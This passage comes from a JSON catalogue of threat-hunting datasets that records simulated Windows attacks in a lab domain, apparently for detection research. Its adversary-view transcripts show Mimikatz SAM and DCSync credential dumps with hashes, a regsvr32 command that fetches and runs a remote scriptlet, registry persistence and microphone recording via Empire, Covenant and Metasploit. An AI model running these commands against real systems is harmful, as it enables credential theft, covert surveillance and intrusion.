Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nWE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5972   5/0.0    2020-09-22 08:05:18  http            \n\n(Empire: agents) > interact WE8XYD3K\n(Empire: WE8XYD3K) > usemodule credentials/mimikatz/sam*\n(Empire: powershell/credentials/mimikatz/sam) > info\n\n              Name: Invoke-Mimikatz SAM dump\n            Module: powershell/credentials/mimikatz/sam\n        NeedsAdmin: True\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @JosephBialek\n  @gentilkiwi\n\nDescription:\n  Runs PowerSploit's Invoke-Mimikatz function to extract\n  hashes from the Security Account Managers (SAM) database.\n\nComments:\n  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com htt\n  ps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#ls\n  a\n\nOptions:\n\n  Name  Required    Value                     Description\n  ----  --------    -------                   -----------\n  Agent True        WE8XYD3K                  Agent to run module on.                 \n\n(Empire: powershell/credentials/mimikatz/sam) > execute\n[*] Tasked WE8XYD3K to run TASK_CMD_JOB\n[*] Agent WE8XYD3K tasked with task ID 3\n[*] Tasked agent WE8XYD3K to run module powershell/credentials/mimikatz/sam\n(Empire: powershell/credentials/mimikatz/sam) > \nJob started: Z4KLXY\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-4228717743-1032521047-1810997296\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\nmimikatz(powershell) # token::elevate\nToken Id  : 0\nUser name : \nSID name  : NT AUTHORITY\\SYSTEM\n\n696     {0;000003e7} 1 D 27257          NT AUTHORITY\\SYSTEM     S-1-5-18        (04g,21p)       Primary\n-> Impersonated !\n* Process Token : {0;0010a7df} 2 F 10859624    THESHIRE\\pgustavo       S-1-5-21-4228717743-1032521047-1810997296-1104  (17g,24p)       Primary\n* Thread Token  : {0;000003e7} 1 D 12272014    NT AUTHORITY\\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)\n\nmimikatz(powershell) # lsadump::sam\nDomain : WORKSTATION5\nSysKey : 8e84403d1d0dcb7cac8f92c438143741\nLocal SID : S-1-5-21-2579707521-1384412784-3942915809\n\nSAMKey : 506df337a2681cb7e4c265d30250d55d\n\nRID  : 000001f4 (500)\nUser : wardog\n  Hash NTLM: 42ddb2963bbe8f1c075fc869d3bce33e\n\nSupplemental Credentials:\n* Primary:NTLM-Strong-NTOWF *\n    Random Value : 85c5e007a00c6fb1c5adf026cf9dd42f\n\n* Primary:Kerberos-Newer-Keys *\n    Default Salt : WORKSTATION5Administrator\n    Default Iterations : 4096\n    Credentials\n      aes256_hmac       (4096) : d24867d975ac3fead7e604bc793bc32c42e4f599d0fd871cebca72444a9475a8\n      aes128_hmac       (4096) : d22a564882d258731c02684449a62b3c\n      des_cbc_md5       (4096) : ae58aed5d5cef143\n    OldCredentials\n      aes256_hmac       (4096) : e104dc2412faf5a1e65d1c10218130aa1d2d70d64bd103e36c6115d9f84c36c9\n      aes128_hmac       (4096) : eff1bddad41de0a68408261d362d1ad3\n      des_cbc_md5       (4096) : 15a8dc46a16e62bf\n\n* Packages *\n    NTLM-Strong-NTOWF\n\n* Primary:Kerberos *\n    Default Salt : WORKSTATION5Administrator\n    Credentials\n      des_cbc_md5       : ae58aed5d5cef143\n    OldCredentials\n      des_cbc_md5       : 15a8dc46a16e62bf\n\nRID  : 000001f5 (501)\nUser : Guest\n\nRID  : 000001f7 (503)\nUser : DefaultAccount\n\nmimikatz(powershell) # token::revert\n* Process Token : {0;0010a7df} 2 F 10859624    THESHIRE\\pgustavo       S-1-5-21-4228717743-1032521047-1810997296-1104  (17g,24p)       Primary\n* Thread Token  : no token\n\n(Empire: powershell/credentials/mimikatz/sam) >"}, "references": null}, "SDWIN-190625133822": {"title": "Empire Reg Dump SAM Hive", "id": "SDWIN-190625133822", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/06/25", "modification_date": "2019/06/25", "platform": ["Windows"], "type": "atomic", "tags": ["SAM Rquest Handle"], "description": "This dataset represents adversaries with administrator privileges using the windows reg utility to dump the SAM registry hive.", "attack_mappings": [{"technique": "T1003", "sub-technique": "002", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_shell_reg_dump_sam.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "Interactive Session", "name": "Remote Desktop Protocol", "module": null, "script": null}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: WE8XYD3K) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nWE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5972   5/0.0    2020-09-22 08:27:49  http            \n\n(Empire: agents) > interact WE8XYD3K\n(Empire: WE8XYD3K) > shell reg save HKLM\\sam sam\n[*] Tasked WE8XYD3K to run TASK_SHELL\n[*] Agent WE8XYD3K tasked with task ID 5\n(Empire: WE8XYD3K) > \nThe operation completed successfully.\n\n..Command execution completed.\n\n(Empire: WE8XYD3K) >"}, "references": null}, "SDWIN-191027055035": {"title": "RDP TaskManager LSASS Dump", "id": "SDWIN-191027055035", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/10/27", "modification_date": "2020/09/21", "platform": ["Windows"], "type": "atomic", "tags": ["RDP Interactive"], "description": "This dataset represents adversaries using RDP and task manager interactively and dump the memory space of lsass.", "attack_mappings": [{"technique": "T1003", "sub-technique": "001", "tactics": ["TA0006"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Remote Interactive Task Manager LSASS Dump", "link": "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-191030201010.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/rdp_interactive_taskmanager_lsass_dump.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "Interactive Session", "name": "RDP", "module": null, "script": null}], "permissions_required": ["Administrator"], "adversary_view": "RDP to victim\nOpen Windows Task Manager as Administrator\nSelect lsass.exe\nRight-click on lsass.exe and select \u201cCreate dump file\u201d"}, "references": null}, "SDWIN-191027223020": {"title": "Covenant ShellCmd InstallUtil", "id": "SDWIN-191027223020", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/10/27", "modification_date": "2020/09/19", "platform": ["Windows"], "type": "atomic", "tags": ["InstallUtil", "LOLBin"], "description": "This dataset represents adversaries proxy executing code through InstallUtil, a trusted Windows utility.", "attack_mappings": [{"technique": "T1218", "sub-technique": "004", "tactics": ["TA0005", "TA0002"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/covenant_installutil.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "ShellCmd", "script": "https://github.com/cobbr/Covenant/blob/7555b19ffb9401c0e37094c25e404a640b1688d7/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"}], "permissions_required": ["User"], "adversary_view": "Upload Task: GruntHTTP.dll -> C:\\ProgramData\\GruntHTTP.dll\n(wardog) > ShellCmd /shellcommand:\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /u c:\\ProgramData\\GruntHTTP.dll\""}, "references": null}, "SDWIN-191225045202": {"title": "Empire Invoke InternalMonologue", "id": "SDWIN-191225045202", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/12/25", "modification_date": "2020/09/21", "platform": ["Windows"], "type": "atomic", "tags": ["Registry Modification", "Windows Registry NetNTLM settings", "Downgrade"], "description": "This dataset represents adversaries downgrading the challenge/response authentication protocol used for network logons, the minimum security negotiated for applications using NTLMSSP, and security settings that restrict outgoing NTLM traffic to remote servers in an environment", "attack_mappings": [{"technique": "T1112", "sub-technique": null, "tactics": ["TA0005"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Extended NetNTLM Downgrade", "link": "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-191224222300.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_monologue_netntlm_downgrade.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "invoke_internal_monologue", "script": "https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/credentials/Invoke-InternalMonologue.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: XFLEZM9N) > usemodule credentials/invoke_internal_monologue*\n(Empire: powershell/credentials/invoke_internal_monologue) > info\n\n            Name: Invoke-InternalMonologue\n            Module: powershell/credentials/invoke_internal_monologue\n        NeedsAdmin: True\n        OpsecSafe: False\n        Language: powershell\nMinLanguageVersion: 2\n        Background: False\nOutputExtension: None\n\nAuthors:\n@eladshamir\n@4lex\n\nDescription:\nUses the Internal Monologue attack to force easily-\ndecryptable Net-NTLMv1 responses over localhost and without\ndirectly touching LSASS.\nhttps://github.com/eladshamir/Internal-Monologue\n\nComments:\nThe underlying powershell function accepts switches that\n[DISABLE] default behaviours. The default settings will\ndowngrade NetNTLM responses to v1, impersonate all users,\nuse challenge 1122334455667788 and restore the registry to\nits original state. Set the options in this module to True\nin order to DISABLE the behaviours Disabling Downgrade and\nImpersonation yields higher OPSEC, but less than ideal loot\n\nOptions:\n\nName        Required    Value                     Description\n----        --------    -------                   -----------\nAgent       True        XFLEZM9N                  Agent to use for InternalMonologue      \nChallenge   True        1122334455667788          Net-NTLM Challenge to send              \nDowngrade   False                                 DISABLE downgrading to allow Net-NTLMv1 \n                                                    responses                               \nImpersonate False                                 DISABLE user impersonation and fetch    \n                                                    only current user                       \nRestore     False                                 DISABLE restoring the registry setting  \n                                                    that allowed v1 responses               \nVerbose     False                                 Verbose                                 \n\n(Empire: powershell/credentials/invoke_internal_monologue) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked XFLEZM9N to run TASK_CMD_WAIT\n[*] Agent XFLEZM9N tasked with task ID 2\n[*] Tasked agent XFLEZM9N to run module powershell/credentials/invoke_internal_monologue\n(Empire: powershell/credentials/invoke_internal_monologue) > pgustavo::shire:6c5a5d82ec8bf7d84989d0876cdfe1b57a0019b72517ca9f:6c5a5d82ec8bf7d84989d0876cdfe1b57a0019b72517ca9f:1122334455667788\nIT001$::shire:cf1dd7f62b7394958df43c8bbdff4888495a7e572a359017:cf1dd7f62b7394958df43c8bbdff4888495a7e572a359017:1122334455667788"}, "references": null}, "SDWIN-200609225055": {"title": "MSF Record Mic", "id": "SDWIN-200609225055", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/06/09", "modification_date": "2020/06/09", "platform": ["Windows"], "type": "atomic", "tags": ["Microphone Access"], "description": "This dataset represents adversaries accessing the microphone of an endpoint.", "attack_mappings": [{"technique": "T1123", "sub-technique": null, "tactics": ["TA0009"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Processes Accessing the Microphone Device", "link": "https://threathunterplaybook.com/notebooks/windows/09_collection/WIN-200609225055.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/collection/host/msf_record_mic.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Metasploit", "module": "post", "script": "https://github.com/pwnieexpress/metasploit-framework/blob/master/modules/post/multi/manage/record_mic.rb"}], "permissions_required": ["User"], "adversary_view": "msf5 exploit(multi/handler) > use post/multi/manage/record_mic\nmsf5 post(multi/manage/record_mic) > set SESSION 2\nSESSION => 2\nmsf5 post(multi/manage/record_mic) > info\n\n      Name: Multi Manage Record Microphone\n    Module: post/multi/manage/record_mic\n  Platform: Linux, OSX, Windows\n      Arch: \n      Rank: Normal\n\nProvided by:\n  sinn3r <sinn3r@metasploit.com>\n\nCompatible session types:\n  Meterpreter\n\nBasic options:\n  Name      Current Setting  Required  Description\n  ----      ---------------  --------  -----------\n  DURATION  5                no        Number of seconds to record\n  SESSION   2                yes       The session to run this module on.\n\nDescription:\n  This module will enable and record your target's microphone. For \n  non-Windows targets, please use Java meterpreter to be able to use \n  this feature.\n\nmsf5 post(multi/manage/record_mic) > run\n\n[*] 172.18.39.6 - 20%...\n[*] 172.18.39.6 - 40%...\n[*] 172.18.39.6 - 60%...\n[*] 172.18.39.6 - 80%...\n[*] 172.18.39.6 - 100%...\n[*] 172.18.39.6 - Audio size: (55169 bytes)\n[+] 172.18.39.6 - Audio recording saved: /home/msf/.msf4/loot/20200610025201_default_172.18.39.6_172.18.39.6.audi_358712.wav\n[*] Post module execution completed\nmsf5 post(multi/manage/record_mic) >"}, "references": null}, "SDWIN-200721232741": {"title": "Empire Regsvr32 Execution", "id": "SDWIN-200721232741", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/07/21", "modification_date": "2020/07/21", "platform": ["Windows"], "type": "atomic", "tags": ["Regsvr32 Execution"], "description": "This dataset represents threat actors leveraging regsvr32 to proxy the execution of an empire payload (.sct file) to create a reverse connection to the C2.", "attack_mappings": [{"technique": "T1218", "sub-technique": "010", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_launcher_sct_regsvr32.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "launcher", "script": "https://github.com/BC-SECURITY/Empire/blob/master/lib/stagers/windows/launcher_sct.py"}], "permissions_required": ["Administrator"], "adversary_view": "Threat Actor View:\n(Empire) > usestager windows/launcher_sct\n(Empire: stager/windows/launcher_sct) > info\n\nName: regsvr32\n\nDescription:\n  Generates an sct file (COM Scriptlet) Host this\n  anywhere\n\nOptions:\n\n  Name             Required    Value             Description\n  ----             --------    -------           -----------\n  Listener         True                          Listener to generate stager for.\n  Language         True        powershell        Language of the stager to generate.\n  StagerRetries    False       0                 Times for the stager to retry\n                                                connecting.\n  Base64           True        True              Switch. Base64 encode the output.\n  Obfuscate        False       False             Switch. Obfuscate the launcher\n                                                powershell code, uses the\n                                                ObfuscateCommand for obfuscation types.\n                                                For powershell only.\n  ObfuscateCommand False       Token\\All\\1       The Invoke-Obfuscation command to use.\n                                                Only used if Obfuscate switch is True.\n                                                For powershell only.\n  OutFile          False       /tmp/launcher.sct File to output SCT to, otherwise\n                                                displayed on the screen.\n  UserAgent        False       default           User-agent string to use for the staging\n                                                request (default, none, or other).\n  Proxy            False       default           Proxy to use for request (default, none,\n                                                or other).\n  ProxyCreds       False       default           Proxy credentials\n                                                ([domain\\]username:password) to use for\n                                                request (default, none, or other).\n\n\n(Empire: stager/windows/launcher_sct) > set Listener http\n(Empire: stager/windows/launcher_sct) > execute\n\n[*] Stager output written out to: /tmp/launcher.sct\n\nVictim's PC\n\nPS C:\\Windows\\System32> .\\regsvr32.exe /s /n /u /i:http://10.10.10.5:8444/launcher.sct scrobj.dll\n\nThreat Actor View:\n\n(Empire: stager/windows/launcher_sct) > back\n(Empire) > \nEmpire: agents) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent 712ETU3B checked in\n[+] Initial agent 712ETU3B from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to 712ETU3B at 172.18.39.5\n\n(Empire: agents) > \n(Empire: agents) > \n(Empire: agents) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n712ETU3B ps 172.18.39.5     WORKSTATION5      *MORDOR\\pgustavo        powershell         9076   5/0.0    2020-07-22 03:29:27  http            \n\n(Empire: agents) >"}, "references": null}, "SDWIN-200722001847": {"title": "Empire Elevated Registry Run Keys", "id": "SDWIN-200722001847", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/07/22", "modification_date": "2020/09/04", "platform": ["Windows"], "type": "atomic", "tags": ["Local Registry Modification", "Registry Run Keys"], "description": "This dataset represents adversaries modifying local Run registry keys (i.e. HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run) for persistence. It also captures the execution of the persistence mechanism.", "attack_mappings": [{"technique": "T1547", "sub-technique": "001", "tactics": ["TA0003"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_persistence_registry_modification_run_keys_elevated_user.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "elevated_registry", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/persistence/Persistence.psm1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: 712ETU3B) > agents\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n712ETU3B ps 172.18.39.5     WORKSTATION5      *MORDOR\\pgustavo        powershell         9076   5/0.0    2020-07-22 04:06:31  http            \n\n(Empire: agents) > \n(Empire: agents) > interact 712ETU3B\n(Empire: 712ETU3B) > \n(Empire: 712ETU3B) > usemodule persistence/elevated/registry*\n\n(Empire: 712ETU3B) > usemodule persistence/elevated/registry*\n(Empire: powershell/persistence/elevated/registry) > info\n\n              Name: Invoke-Registry\n            Module: powershell/persistence/elevated/registry\n        NeedsAdmin: True\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @mattifestation\n  @harmj0y\n\nDescription:\n  Persist a stager (or script) via the\n  HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run registry\n  key. This has an easy detection/removal rating.\n\nComments:\n  https://github.com/mattifestation/PowerSploit/blob/master/Pe\n  rsistence/Persistence.psm1\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        712ETU3B                  Agent to run module on.                 \n  Listener         False                                 Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  KeyName          True        Updater                   Key name for the run trigger.           \n  RegPath          False       HKLM:SOFTWARE\\Microsoft\\  Registry location to store the script   \n                              Windows\\CurrentVersion\\D  code. Last element is the key name.     \n                              ebug                    \n  ADSPath          False                                 Alternate-data-stream location to store \n                                                        the script code.                        \n  ExtFile          False                                 Use an external file for the payload    \n                                                        instead of a stager.                    \n  Cleanup          False                                 Switch. Cleanup the trigger and any     \n                                                        script from specified location.         \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/persistence/elevated/registry) > set Listener http\n(Empire: powershell/persistence/elevated/registry) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked 712ETU3B to run TASK_CMD_WAIT\n[*] Agent 712ETU3B tasked with task ID 7\n[*] Tasked agent 712ETU3B to run module powershell/persistence/elevated/registry\n(Empire: powershell/persistence/elevated/registry) > \nRegistry persistence established using listener http stored in HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Debug.\n\n(Empire: powershell/persistence/elevated/registry) >"}, "references": null}, "SDWIN-200724174200": {"title": "Covenant Remote WMI Eventing ActiveScriptEventConsumers", "id": "SDWIN-200724174200", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/07/24", "modification_date": "2020/07/24", "platform": ["Windows"], "type": "atomic", "tags": ["Remote WMI Eventing"], "description": "This dataset represents adversaries using WMI event subscriptions (ActiveScriptEventConsumers) remotely to move laterally.", "attack_mappings": [{"technique": "T1047", "sub-technique": null, "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_wmi_remote_event_subscription_ActiveScriptEventConsumers.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_wmi_remote_event_subscription_ActiveScriptEventConsumers.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "manual", "name": "shell", "module": "manual", "script": "https://3xpl01tc0d3r.blogspot.com/2020/02/gadgettojscript-covenant-donut.html"}], "permissions_required": ["Administrator"], "adversary_view": null}, "references": ["https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/"]}, "SDWIN-200805020926": {"title": "Covenant DCSync", "id": "SDWIN-200805020926", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/05", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["AD Replication Services", "RPC DRSUAPI DsGetNCChanges"], "description": "This dataset represents adversaries abusing Active Directory Replication services to retrieve secret domain data (i.e. NTLM hashes) from domain accounts.", "attack_mappings": [{"technique": "T1003", "sub-technique": "006", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "DCSync", "script": "https://github.com/cobbr/Covenant/blob/c4d7eba0cfc29e3d5961248ec984a209d4d05de3/Covenant/Data/Tasks/SharpSploit.Credentials.yaml"}], "permissions_required": ["Domain Admin"], "adversary_view": "(wardog) > DCSync /username:\"krbtgt\" /fqdn:\"theshire.local\" /dc:\"MORDORDC\"\n\n  .#####.   mimikatz 2.2.0 (x64) #17763 Apr  9 2019 23:22:27\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\nmimikatz(powershell) # lsadump::dcsync /user:krbtgt /domain:theshire.local /dc:MORDORDC\n[DC] 'theshire.local' will be the domain\n[DC] 'MORDORDC' will be the DC server\n[DC] 'krbtgt' will be the user account\n\nObject RDN           : krbtgt\n\n** SAM ACCOUNT **\n\nSAM Username         : krbtgt\nAccount Type         : 30000000 ( USER_OBJECT )\nUser Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )\nAccount expiration   : \nPassword last change : 8/4/2020 9:30:22 PM\nObject Security ID   : S-1-5-21-3669966080-2286457517-972388166-502\nObject Relative ID   : 502\n\nCredentials:\n  Hash NTLM: 9810d5b30826619ed962194bc35cb66d\n    ntlm- 0: 9810d5b30826619ed962194bc35cb66d\n    lm  - 0: 2bd18bfa988700fc1f845909043f7785\n\nSupplemental Credentials:\n* Primary:NTLM-Strong-NTOWF *\n    Random Value : d7477916da5d01ca6366caaad478f535\n\n* Primary:Kerberos-Newer-Keys *\n    Default Salt : THESHIRE.LOCALkrbtgt\n    Default Iterations : 4096\n    Credentials\n      aes256_hmac       (4096) : 1ffb5b5ca0ba20b19de132f44a580d67c96362f4ec21c8e8057ad8b4a5cbe99e\n      aes128_hmac       (4096) : 49e4ec6edd3d27f0eda5ed4b32df29c4\n      des_cbc_md5       (4096) : f162e6c46b5d10e9\n\n* Primary:Kerberos *\n    Default Salt : THESHIRE.LOCALkrbtgt\n    Credentials\n      des_cbc_md5       : f162e6c46b5d10e9\n\n* Packages *\n    NTLM-Strong-NTOWF\n\n* Primary:WDigest *\n    01  1e9687e12c22c61ce56e06b679067068\n    02  bd4ff4a6ad0092c086110d7f177bf2dd\n    03  bef34dc3488c458be7a07de25cee5c25\n    04  1e9687e12c22c61ce56e06b679067068\n    05  bd4ff4a6ad0092c086110d7f177bf2dd\n    06  ec54a02a8b4c407023b921f839db0695\n    07  1e9687e12c22c61ce56e06b679067068\n    08  34460bb2c44aae9f8397a5df0846babd\n    09  34460bb2c44aae9f8397a5df0846babd\n    10  0a104dba17fcb7b32f0a39c5694ae42d\n    11  cec2d9932979ed578ba260b233290ad6\n    12  34460bb2c44aae9f8397a5df0846babd\n    13  dbd9ff299298ee7649121015643a45c0\n    14  cec2d9932979ed578ba260b233290ad6\n    15  2d5f29cfd994b4a31dc71ff0d4f4b735\n    16  2d5f29cfd994b4a31dc71ff0d4f4b735\n    17  1a6e2adbc126ac59916af47ca0c2047d\n    18  b99ae20fdbff05738cc3c4341f5819b0\n    19  791ed67574eee311ed74e911f840e622\n    20  71d939df702fe13f003e39b9421f450d\n    21  cc9c9f66309c5d6412773943efa08efd\n    22  cc9c9f66309c5d6412773943efa08efd\n    23  1f076ec382ae6f7cf5ca3750ad70c140\n    24  a16cb7dc0b7a969d65aff54a4180d63a\n    25  a16cb7dc0b7a969d65aff54a4180d63a\n    26  80706a2b93f2a4d53d6df1b4b8bfe029\n    27  c3c8bedd3c2f3db046410f60ab728f57\n    28  e0b5d1db4b2119a9e621a2a3199828bb\n    29  b23dd36a70988139bbee48c668232993"}, "references": null}, "SDWIN-200805034820": {"title": "Covenant SC.exe Utility Query", "id": "SDWIN-200805034820", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/05", "modification_date": "2020/08/05", "platform": ["Windows"], "type": "atomic", "tags": ["RPC QueryServiceStatus", "SMB Svcctl"], "description": "This dataset represents an adversary leveraging the sc.exe utility to query (RPC QueryServiceStatus method) for the statu of a service on a remote endpoint.", "attack_mappings": [{"technique": "T1021", "sub-technique": "002", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sc_query_dcerpc_smb_svcctl.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sc_query_dcerpc_smb_svcctl.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "SharpSC", "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSC.yaml"}], "permissions_required": ["Administrator"], "adversary_view": "sc.exe \\\\WORKSTATION6 query ikeext"}, "references": null}, "SDWIN-200806012009": {"title": "Covenant SharpSC Query", "id": "SDWIN-200806012009", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/06", "modification_date": "2020/08/06", "platform": ["Windows"], "type": "atomic", "tags": ["RPC EnumServiceStatusW", "SMB Svcctl"], "description": "This dataset represents a threat actor leveraging the RPC method EnumServiceStatusW over SMB svcctl to query the status of a service on a remote endpoint..", "attack_mappings": [{"technique": "T1021", "sub-technique": "002", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sharpsc_query_dcerpc_smb_svcctl.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sharpsc_query_dcerpc_smb_svcctl.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "SharpSC", "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSC.yaml"}], "permissions_required": ["Administrator"], "adversary_view": "(wardog) > SharpSC /command:\"action=query computername=WORKSTATION6 service=ikeext\"\n\n[+] Service information for IKEEXT on WORKSTATION6:\n\n  DisplayName: IKE and AuthIP IPsec Keying Modules\n  ServiceName: IKEEXT\n  Status     : Stopped\n  CanStop    : False"}, "references": null}, "SDWIN-200806015757": {"title": "Covenant Remote File Copy", "id": "SDWIN-200806015757", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/06", "modification_date": 